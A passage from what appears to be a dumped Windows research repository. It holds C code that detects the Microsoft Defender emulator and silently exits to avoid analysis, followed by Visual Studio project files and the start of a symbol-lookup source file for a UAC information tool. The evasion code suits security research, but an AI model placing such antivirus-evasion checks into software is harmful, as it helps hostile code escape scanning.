ImageBase,\n    _In_ DWORD ProcedureHash\n)\n{\n    DWORD i;\n    ULONG sz = 0;\n\n    IMAGE_DOS_HEADER *DosHeader;\n    IMAGE_EXPORT_DIRECTORY *Exports;\n    PDWORD Names, Functions;\n    PWORD Ordinals;\n\n    DWORD_PTR FunctionPtr;\n\n    if (ImageBase == NULL)\n        
return NULL;\n\n    DosHeader = (IMAGE_DOS_HEADER*)ImageBase;\n    if (DosHeader->e_magic != IMAGE_DOS_SIGNATURE)\n        return NULL;\n\n    Exports = (IMAGE_EXPORT_DIRECTORY*)RtlImageDirectoryEntryToData(ImageBase, \n        TRUE,\n        IMAGE_DIRECTORY_ENTRY_EXPORT, \n        &sz);\n\n    if (Exports == NULL)\n        return NULL;\n\n    Names = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfNames);\n    Ordinals = (PWORD)((PBYTE)DosHeader + Exports->AddressOfNameOrdinals);\n    Functions = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfFunctions);\n\n    for (i = 0; i < Exports->NumberOfNames; i++) {\n        if (wdxGetHashForString((char *)((PBYTE)DosHeader + Names[i])) == ProcedureHash) {\n            FunctionPtr = Functions[Ordinals[i]];\n            return (PBYTE)ImageBase + FunctionPtr;\n        }\n    }\n\n    return NULL;\n}\n/*\n* wdCheckEmulatedVFS\n*\n* Purpose:\n*\n* Detect Microsoft Security Engine emulation by its own VFS artefact.\n*\n* Microsoft AV provides a special emulated environment for the scanned application where it\n* fakes general system information, process environment structures/data to make sure\n* API calls are transparent for scanned code. 
It also uses a simple Virtual File System\n* allowing this AV to track file system changes and, if needed, continue emulation on a new target.\n*\n* This method has been implemented in commercial malware presumably since 2013.\n*\n*/\nVOID wdCheckEmulatedVFS(\n    VOID\n)\n{\n    WCHAR szBuffer[MAX_PATH];\n    WCHAR szMsEngVFS[12] = { L':', L'\\', L'm', L'y', L'a', L'p', L'p', L'.', L'e', L'x', L'e', 0 };\n\n    RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));\n    if (GetModuleFileName(NULL, szBuffer, MAX_PATH)) {\n        if (_strstri(szBuffer, szMsEngVFS) != NULL) {\n            RtlExitUserProcess((UINT)0);\n        }\n    }\n}\n\n/*\n* wdIsEmulatorPresent\n*\n* Purpose:\n*\n* Detect MS emulator state.\n*\n*/\nNTSTATUS wdIsEmulatorPresent(\n    VOID)\n{\n    PCHAR ImageBase = NULL;\n\n    IMAGE_DOS_HEADER *DosHeader;\n    IMAGE_EXPORT_DIRECTORY *Exports;\n    PDWORD Names;\n\n    ULONG i, c, Hash, sz = 0;\n\n    UNICODE_STRING usNtdll = RTL_CONSTANT_STRING(L\"ntdll.dll\");\n\n    if (!NT_SUCCESS(LdrGetDllHandleEx(LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT,\n        NULL, NULL, &usNtdll, &ImageBase)))\n    {\n        return STATUS_DLL_NOT_FOUND;\n    }\n\n    if (ImageBase == NULL)\n        return STATUS_DLL_NOT_FOUND;\n\n    Exports = (IMAGE_EXPORT_DIRECTORY*)RtlImageDirectoryEntryToData(ImageBase, TRUE,\n        IMAGE_DIRECTORY_ENTRY_EXPORT, &sz);\n\n    if (Exports == NULL)\n        return STATUS_INVALID_IMAGE_FORMAT;\n\n    DosHeader = (IMAGE_DOS_HEADER*)ImageBase;\n    Names = (PDWORD)((PBYTE)DosHeader + Exports->AddressOfNames);\n\n    for (i = 0; i < Exports->NumberOfNames; i++) {\n        Hash = wdxGetHashForString((char *)((PBYTE)DosHeader + Names[i]));\n        for (c = 0; c < RTL_NUMBER_OF(wdxEmulatorAPIHashTable); c++) {\n            if (Hash == wdxEmulatorAPIHashTable[c])\n                return STATUS_NEEDS_REMEDIATION;\n        }\n    }\n\n    return STATUS_NOT_SUPPORTED;\n}\n\n/*\n* wdIsEmulatorPresent2\n*\n* Purpose:\n*\n* Detect MS emulator state 2.\n*\n* 
Microsoft AV defines virtual environment dlls loaded in runtime from VDM files.\n* These fake libraries implement additional detection layer and come with a lot of\n* predefined values.\n*\n*/\nBOOLEAN wdIsEmulatorPresent2(\n    VOID)\n{   \n    return NtIsProcessInJob(NtCurrentProcess(), UlongToHandle(10)) == 0x125;\n}\n\n/*\n* wdIsEmulatorPresent3\n*\n* Purpose:\n*\n* Same as previous.\n*\n*/\nBOOLEAN wdIsEmulatorPresent3(\n    VOID)\n{\n    if (NT_SUCCESS(NtCompressKey(UlongToHandle(0xFFFF1234))))\n        return TRUE;\n\n    return FALSE;\n}\n\n#pragma warning(pop)\n"
  },
  {
    "path": "Source/Shared/windefend.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015 - 2020\n*\n*  TITLE:       WINDEFEND.H\n*\n*  VERSION:     3.50\n*\n*  DATE:        05 Oct 2020\n*\n*  MSE / Windows Defender anti-emulation part header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nVOID wdCheckEmulatedVFS(\n    VOID);\n\nNTSTATUS wdIsEmulatorPresent(\n    VOID);\n\nBOOLEAN wdIsEmulatorPresent2(\n    VOID);\n\nBOOLEAN wdIsEmulatorPresent3(\n    VOID);\n\n"
  },
  {
    "path": "Source/Yuubari/Yuubari.vcxproj",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"15.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup Label=\"ProjectConfigurations\">\n    <ProjectConfiguration Include=\"Debug|x64\">\n      <Configuration>Debug</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"ReleaseInternal|x64\">\n      <Configuration>ReleaseInternal</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n    <ProjectConfiguration Include=\"Release|x64\">\n      <Configuration>Release</Configuration>\n      <Platform>x64</Platform>\n    </ProjectConfiguration>\n  </ItemGroup>\n  <PropertyGroup Label=\"Globals\">\n    <ProjectGuid>{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}</ProjectGuid>\n    <Keyword>Win32Proj</Keyword>\n    <RootNamespace>Yuubari</RootNamespace>\n    <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.Default.props\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>true</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\" Label=\"Configuration\">\n    <ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\" Label=\"Configuration\">\n    
<ConfigurationType>Application</ConfigurationType>\n    <UseDebugLibraries>false</UseDebugLibraries>\n    <PlatformToolset>v145</PlatformToolset>\n    <WholeProgramOptimization>true</WholeProgramOptimization>\n    <CharacterSet>Unicode</CharacterSet>\n    <SpectreMitigation>false</SpectreMitigation>\n  </PropertyGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.props\" />\n  <ImportGroup Label=\"ExtensionSettings\">\n  </ImportGroup>\n  <ImportGroup Label=\"Shared\">\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Label=\"PropertySheets\" Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <ImportGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\" Label=\"PropertySheets\">\n    <Import Project=\"$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props\" Condition=\"exists('$(UserRootDir)\\Microsoft.Cpp.$(Platform).user.props')\" Label=\"LocalAppDataPlatform\" />\n  </ImportGroup>\n  <PropertyGroup Label=\"UserMacros\" />\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LinkIncremental>true</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    
<OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>UacInfo64</TargetName>\n    <CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>\n    <RunCodeAnalysis>false</RunCodeAnalysis>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <LinkIncremental>false</LinkIncremental>\n    <OutDir>.\\output\\$(Platform)\\$(Configuration)\\</OutDir>\n    <IntDir>.\\output\\$(Platform)\\$(Configuration)\\</IntDir>\n    <TargetName>UacInfo64</TargetName>\n    <CodeAnalysisRuleSet>SecurityRules.ruleset</CodeAnalysisRuleSet>\n    <RunCodeAnalysis>true</RunCodeAnalysis>\n  </PropertyGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <ClCompile>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <WarningLevel>Level4</WarningLevel>\n      <Optimization>Disabled</Optimization>\n      <PreprocessorDefinitions>_DEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <GenerateDebugInformation>true</GenerateDebugInformation>\n      <EntryPointSymbol>main</EntryPointSymbol>\n      <MinimumRequiredVersion>6.0</MinimumRequiredVersion>\n    </Link>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MaxSpeed</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      
<SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n      <ControlFlowGuard>Guard</ControlFlowGuard>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <EnablePREfast>false</EnablePREfast>\n      <StringPooling>true</StringPooling>\n    </ClCompile>\n    <Link>\n      <SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n      <EntryPointSymbol>main</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <MinimumRequiredVersion>6.0</MinimumRequiredVersion>\n      <AdditionalOptions>/NOCOFFGRPINFO %(AdditionalOptions)</AdditionalOptions>\n    </Link>\n    <PostBuildEvent>\n      <Command>\n      </Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemDefinitionGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <ClCompile>\n      <WarningLevel>Level4</WarningLevel>\n      <PrecompiledHeader>\n      </PrecompiledHeader>\n      <Optimization>MinSpace</Optimization>\n      <FunctionLevelLinking>true</FunctionLevelLinking>\n      <IntrinsicFunctions>true</IntrinsicFunctions>\n      <PreprocessorDefinitions>NDEBUG;_WINDOWS;%(PreprocessorDefinitions)</PreprocessorDefinitions>\n      <SDLCheck>true</SDLCheck>\n      <CompileAs>CompileAsC</CompileAs>\n      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>\n      <ControlFlowGuard>Guard</ControlFlowGuard>\n      <MultiProcessorCompilation>true</MultiProcessorCompilation>\n      <AdditionalIncludeDirectories>$(ProjectDir);$(SolutionDir)</AdditionalIncludeDirectories>\n      <EnablePREfast>true</EnablePREfast>\n      <StringPooling>true</StringPooling>\n      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>\n    </ClCompile>\n    <Link>\n      
<SubSystem>Console</SubSystem>\n      <EnableCOMDATFolding>true</EnableCOMDATFolding>\n      <OptimizeReferences>true</OptimizeReferences>\n      <GenerateDebugInformation>false</GenerateDebugInformation>\n      <EntryPointSymbol>main</EntryPointSymbol>\n      <SetChecksum>true</SetChecksum>\n      <MinimumRequiredVersion>6.0</MinimumRequiredVersion>\n      <AdditionalOptions>/NOCOFFGRPINFO %(AdditionalOptions)</AdditionalOptions>\n    </Link>\n    <PostBuildEvent>\n      <Command>\\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\UacInfo64.exe</Command>\n    </PostBuildEvent>\n  </ItemDefinitionGroup>\n  <ItemGroup>\n    <ClCompile Include=\"..\\Shared\\cmdline.c\" />\n    <ClCompile Include=\"..\\Shared\\hde\\hde64.c\" />\n    <ClCompile Include=\"..\\Shared\\itostr.c\" />\n    <ClCompile Include=\"..\\Shared\\strtoi.c\" />\n    <ClCompile Include=\"..\\Shared\\ultostr.c\" />\n    <ClCompile Include=\"..\\Shared\\_filename.c\" />\n    <ClCompile Include=\"..\\Shared\\_strcat.c\" />\n    <ClCompile Include=\"..\\Shared\\_strcmp.c\" />\n    <ClCompile Include=\"..\\Shared\\_strcmpi.c\" />\n    <ClCompile Include=\"..\\Shared\\_strcpy.c\" />\n    <ClCompile Include=\"..\\Shared\\_strend.c\" />\n    <ClCompile Include=\"..\\Shared\\_strlen.c\" />\n    <ClCompile Include=\"..\\Shared\\_strncmp.c\" />\n    <ClCompile Include=\"..\\Shared\\_strncpy.c\" />\n    <ClCompile Include=\"appinfo.c\" />\n    <ClCompile Include=\"basic.c\" />\n    <ClCompile Include=\"comobj.c\" />\n    <ClCompile Include=\"cui.c\" />\n    <ClCompile Include=\"fusion.c\" />\n    <ClCompile Include=\"logger.c\" />\n    <ClCompile Include=\"main.c\" />\n    <ClCompile Include=\"sup.c\" />\n    <ClCompile Include=\"tests\\test_fusion.c\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"..\\Shared\\cmdline.h\" />\n    <ClInclude Include=\"..\\Shared\\hde\\hde64.h\" />\n    <ClInclude Include=\"..\\Shared\\hde\\pstdint.h\" />\n    <ClInclude 
Include=\"..\\Shared\\hde\\table64.h\" />\n    <ClInclude Include=\"..\\Shared\\minirtl.h\" />\n    <ClInclude Include=\"..\\Shared\\rtltypes.h\" />\n    <ClInclude Include=\"..\\Shared\\_filename.h\" />\n    <ClInclude Include=\"appinfo.h\" />\n    <ClInclude Include=\"basic.h\" />\n    <ClInclude Include=\"comobj.h\" />\n    <ClInclude Include=\"consts.h\" />\n    <ClInclude Include=\"cui.h\" />\n    <ClInclude Include=\"fusion.h\" />\n    <ClInclude Include=\"global.h\" />\n    <ClInclude Include=\"logger.h\" />\n    <ClInclude Include=\"resource.h\" />\n    <ClInclude Include=\"sup.h\" />\n    <ClInclude Include=\"tests\\test_fusion.h\" />\n    <ClInclude Include=\"wintrustex.h\" />\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"Resource.rc\" />\n  </ItemGroup>\n  <ItemGroup>\n    <Image Include=\"yuubari.ico\" />\n  </ItemGroup>\n  <Import Project=\"$(VCTargetsPath)\\Microsoft.Cpp.targets\" />\n  <ImportGroup Label=\"ExtensionTargets\">\n  </ImportGroup>\n</Project>"
  },
  {
    "path": "Source/Yuubari/Yuubari.vcxproj.filters",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <ItemGroup>\n    <Filter Include=\"Source Files\">\n      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>\n      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>\n    </Filter>\n    <Filter Include=\"Header Files\">\n      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>\n      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>\n    </Filter>\n    <Filter Include=\"Resource Files\">\n      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>\n      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>\n    </Filter>\n    <Filter Include=\"minirtl\">\n      <UniqueIdentifier>{336547cc-9eeb-4b6e-affd-aa70e6f7bfba}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"testunits\">\n      <UniqueIdentifier>{c345b77b-4418-4498-8377-bcbbbc11aa76}</UniqueIdentifier>\n    </Filter>\n    <Filter Include=\"hde\">\n      <UniqueIdentifier>{feac226e-813e-438e-a68d-49e68ad8f8bb}</UniqueIdentifier>\n    </Filter>\n  </ItemGroup>\n  <ItemGroup>\n    <ClCompile Include=\"main.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"cui.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strcat.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strcpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strlen.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strend.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"sup.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"comobj.c\">\n      <Filter>Source 
Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strcmpi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strncpy.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\strtoi.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\ultostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"fusion.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"basic.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"appinfo.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_filename.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strcmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"logger.c\">\n      <Filter>Source Files</Filter>\n    </ClCompile>\n    <ClCompile Include=\"tests\\test_fusion.c\">\n      <Filter>testunits</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\cmdline.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\hde\\hde64.c\">\n      <Filter>hde</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\_strncmp.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n    <ClCompile Include=\"..\\Shared\\itostr.c\">\n      <Filter>minirtl</Filter>\n    </ClCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <ClInclude Include=\"global.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\minirtl.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\rtltypes.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"resource.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"cui.h\">\n      
<Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"sup.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"comobj.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"fusion.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"basic.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"appinfo.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\_filename.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"wintrustex.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"logger.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"tests\\test_fusion.h\">\n      <Filter>testunits</Filter>\n    </ClInclude>\n    <ClInclude Include=\"consts.h\">\n      <Filter>Header Files</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\cmdline.h\">\n      <Filter>minirtl</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\hde\\hde64.h\">\n      <Filter>hde</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\hde\\pstdint.h\">\n      <Filter>hde</Filter>\n    </ClInclude>\n    <ClInclude Include=\"..\\Shared\\hde\\table64.h\">\n      <Filter>hde</Filter>\n    </ClInclude>\n  </ItemGroup>\n  <ItemGroup>\n    <ResourceCompile Include=\"Resource.rc\">\n      <Filter>Resource Files</Filter>\n    </ResourceCompile>\n  </ItemGroup>\n  <ItemGroup>\n    <Image Include=\"yuubari.ico\">\n      <Filter>Resource Files</Filter>\n    </Image>\n  </ItemGroup>\n</Project>"
  },
  {
    "path": "Source/Yuubari/Yuubari.vcxproj.user",
    "content": "﻿<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"14.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Debug|x64'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='Release|x64'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n  <PropertyGroup Condition=\"'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'\">\n    <LocalDebuggerCommandArguments>\n    </LocalDebuggerCommandArguments>\n    <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>\n  </PropertyGroup>\n</Project>"
  },
  {
    "path": "Source/Yuubari/appinfo.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n*  TITLE:       APPINFO.C\n*\n*  VERSION:     1.60\n*\n*  DATE:        17 Jun 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#pragma comment(lib, \"version.lib\")\n\n#define DEFAULT_SYMPATH     L\"*https://msdl.microsoft.com/download/symbols\"\n\n#define TEXT_SECTION \".text\"\n#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION)\n\n#define RDATA_SECTION \".rdata\"\n#define RDATA_SECTION_LENGTH sizeof(RDATA_SECTION)\n\n#define TestChar(x)  (((WCHAR)x >= L'A') && ((WCHAR)x <= L'z')) \n\n/*\n* GetAppInfoBuildVersion\n*\n* Purpose:\n*\n* Return build number of AppInfo.\n*\n*/\nBOOL GetAppInfoBuildVersion(\n    _In_ LPWSTR lpFileName,\n    _Out_ ULONG* BuildNumber\n)\n{\n    BOOL bResult = FALSE;\n    DWORD dwHandle, dwSize;\n    PVOID vinfo = NULL;\n    UINT Length;\n    VS_FIXEDFILEINFO* pFileInfo;\n\n    *BuildNumber = 0;\n\n    dwHandle = 0;\n    dwSize = GetFileVersionInfoSize(lpFileName, &dwHandle);\n    if (dwSize) {\n        vinfo = supHeapAlloc(dwSize);\n        if (vinfo) {\n            if (GetFileVersionInfo(lpFileName, 0, dwSize, vinfo)) {\n                bResult = VerQueryValue(vinfo, TEXT(\"\\\\\"), (LPVOID*)&pFileInfo, (PUINT)&Length);\n                if (bResult) {\n                    *BuildNumber = HIWORD(pFileInfo->dwFileVersionLS);\n                }\n            }\n            supHeapFree(vinfo);\n        }\n    }\n    return bResult;\n}\n\n/*\n* LookupAddressBySymbol\n*\n* Purpose:\n*\n* Return address of symbol by name.\n*\n*/\nULONG64 LookupAddressBySymbol(\n    _In_ pfnSymFromNameW SymFromName,\n    _In_ 
LPCWSTR SymbolName,\n    _Out_opt_ PBOOL Status\n)\n{\n    BOOL bStatus = FALSE;\n    SIZE_T symSize;\n    ULONG64 symAddress = 0;\n    PSYMBOL_INFOW symbolInfo = NULL;\n\n    symSize = sizeof(SYMBOL_INFOW);\n\n    symbolInfo = (PSYMBOL_INFOW)supHeapAlloc(symSize);\n    if (symbolInfo) {\n\n        symbolInfo->SizeOfStruct = sizeof(SYMBOL_INFOW);\n        symbolInfo->MaxNameLen = 0; //name is not used\n\n        bStatus = SymFromName(\n            GetCurrentProcess(),\n            SymbolName,\n            symbolInfo);\n\n        if (bStatus)\n            symAddress = symbolInfo->Address;\n\n        supHeapFree(symbolInfo);\n    }\n\n    if (Status)\n        *Status = bStatus;\n\n    return symAddress;\n}\n\n/*\n* ResolveAppInfoSymbols\n*\n* Purpose:\n*\n* Load dbghelp, resolve appinfo pointers through symbols lookup.\n*\n*/\nBOOL ResolveAppInfoSymbols(\n    _In_ PUAC_AI_GLOBALS AppInfo\n)\n{\n    SIZE_T dirLength;\n    WCHAR szBuffer[MAX_PATH * 2];\n    WCHAR szUserSearchPath[MAX_PATH * 2];\n\n    HANDLE dllHandle;\n    HANDLE processHandle = GetCurrentProcess();\n    DWORD64 baseOfDll;\n\n    pfnSymInitializeW pSymInitialize;\n    pfnSymSetOptions pSymSetOptions;\n    pfnSymLoadModuleExW pSymLoadModuleEx;\n    pfnSymFromNameW pSymFromName;\n    pfnSymUnloadModule64 pSymUnloadModule64;\n    pfnSymCleanup pSymCleanup;\n\n\n    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n    if (GetModuleFileName(NULL, szBuffer, MAX_PATH) == 0)\n        return FALSE;\n\n    _filepath(szBuffer, szBuffer);\n    _strcat(szBuffer, TEXT(\"symdll\\\\\"));\n    dirLength = _strlen(szBuffer);\n    _strcat(szBuffer, TEXT(\"dbghelp.dll\"));\n    dllHandle = LoadLibrary(szBuffer);\n    if (dllHandle == NULL)\n        return FALSE;\n\n    /*szBuffer[dirLength] = 0;\n    _strcat(szBuffer, TEXT(\"symsrv.dll\"));\n    LoadLibrary(szBuffer);*/\n\n    pSymInitialize = (pfnSymInitializeW)GetProcAddress(dllHandle, \"SymInitializeW\");\n    if (pSymInitialize == NULL)\n        return FALSE;\n\n    
